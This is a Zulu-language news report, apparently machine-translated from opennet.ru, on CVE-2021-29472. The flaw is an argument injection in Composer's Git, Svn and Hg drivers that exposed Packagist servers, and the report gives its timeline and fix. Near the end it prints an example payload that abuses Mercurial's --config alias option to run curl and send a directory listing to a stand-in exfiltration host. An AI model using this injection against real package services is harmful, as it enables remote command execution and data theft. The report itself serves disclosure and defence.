Ukuba sengozini okubalulekile (CVE-2021-29472) kukhonjwe kusiphathi sokuncika komqambi esivumela imiyalo engafanele ukuthi isetshenziswe kusistimu lapho kucutshungulwa iphakheji enevelu ye-URL efomethwe ngokukhethekile ecacisa ikheli ukuze kulandwe ikhodi yomthombo. Inkinga yenzeka ezingxenyeni ze-GitDriver, SvnDriver, kanye ne-HgDriver ezisetshenziswa uma kusetshenziswa amasistimu okulawula umthombo we-Git, i-Subversion, kanye ne-Mercurial. Ukuba sengozini kuxazululwe ekukhishweni komqambi 1.10.22 kanye no-2.0.13.
Kuyaphawuleka ukuthi inkinga ithinte ngokuyinhloko inqolobane yephakheji ezenzakalelayo yoMqambi, i-Packagist, equkethe amaphakheji angu-306 onjiniyela be-PHP futhi enikezela ukulanda okungaphezu kwezigidigidi eziyi-1.4 ngenyanga. Ukuhlolwa kubonise ukuthi uma kukhona ulwazi lwenkinga, abahlaseli bangakwazi ukulawula ingqalasizinda ye-Packagist futhi bahlasele izifakazelo zabanakekeli noma baqondise kabusha ukulandwa kwephakheji kuseva yenkampani yangaphandle, ukuhlela ukulethwa kwephakheji elihlukile ngezinguquko ezinonya ukuze kungene umnyango ongemuva. phakathi nenqubo yokufaka ukuncika.
Ingozi yabasebenzisi bokugcina ikhawulelwe eqinisweni lokuthi okuqukethwe kwe-composer.json ngokuvamile kunqunywa umsebenzisi, futhi izixhumanisi zomthombo zidluliselwa lapho ufinyelela amaqoqo ezinkampani zangaphandle, ngokuvamile athembekile. Igalelo elikhulu lawela endaweni yokugcina ye-Packagist.org kanye nesevisi ye-Private Packagist, eyabiza uMqambi ngokudluliswa kwedatha etholwe kubasebenzisi. Abahlaseli bangasebenzisa ikhodi yabo kumaseva e-Packagist ngokubeka iphakheji eklanywe ngokukhethekile.
Ithimba le-Packagist lilungise ukuba sengozini phakathi namahora angu-12 okuba sengozini okubikwe. Abacwaningi bazisa ngasese abathuthukisi be-Packagist ngo-Ephreli 22, futhi inkinga yalungiswa ngalolo suku. Isibuyekezo esisesidlangalaleni soMqambi okhuluma ngokuba sengozini sashicilelwa ngo-Ephreli 27, nemininingwane evezwe ngo-Ephreli 28. Ukuhlolwa kwamalogi kumaseva e-Packagist akuzange kuveze noma yimuphi umsebenzi osolisayo ohlobene nokuba sengozini.
Inkinga ibangelwa iphutha kukhodi yokuqinisekisa ye-URL kufayela lempande composer.json kanye nezixhumanisi zokulanda umthombo. Iphutha belikhona kukhodi kusukela ngoNovemba 2011. I-Packagist isebenzisa izendlalelo ezikhethekile ukuhlela ukulayishwa kwekhodi ngaphandle kokuboshelwa ohlelweni oluthile lokulawula umthombo, olwenziwa ngokubiza “kusuka kuShellCommandline” kanye nokudlulisa ama-agumenti omugqa womyalo. Isibonelo, ku-git, umyalo othi "git ls-remote -heads $URL" ubizwa, lapho i-URL icutshungulwa kusetshenziswa indlela ye-"ProcessExecutor::escape($url)", ebalekela izakhiwo ezingaba yingozi ezifana ne-"$(. ..)" noma "` ...`".
Umnyombo wenkinga ukuthi i-ProcessExecutor::indlela yokubaleka ayizange ibalekele ukulandelana kuka-“—”, okuvumele noma iyiphi ipharamitha yocingo eyengeziwe ukuthi icaciswe ku-URL. Ukuphunyuka okunjalo kwakulahlekile kubashayeli be-GitDriver.php, SvnDriver.php kanye ne-HgDriver.php. Ukuhlasela kwe-GitDriver.php kwaphazanyiswa ukuthi umyalo othi “git ls-remote” awuzange usekele ukucacisa izimpikiswano ezengeziwe ngemva kwendlela. Ukuhlaselwa kwe-HgDriver.php kwenzeke ngokudlulisela ipharamitha ethi “--config” kunsiza ethi “hq”, ekuvumela ukuthi uhlele ukukhishwa kwanoma yimuphi umyalo ngokuxhaphaza isilungiselelo esithi “alias.identify”. Isibonelo, ukuze udawunilode futhi wenze ikhodi ngokusebenzisa insiza ye-curl, ungacacisa: —config=alias.identify=!curl http://exfiltration-host.tld —data “$(ls -alh)”
Ngokuthumela iphakheji yokuhlola ene-URL efanayo ku-Packagist, abacwaningi baqinisekise ukuthi ngemva kokuthumela, iseva yabo ithole isicelo se-HTTP kwesinye seziphakeli ze-Packagist ku-AWS equkethe uhlu lwamafayela kuhla lwemibhalo lwamanje.
Source: opennet.ru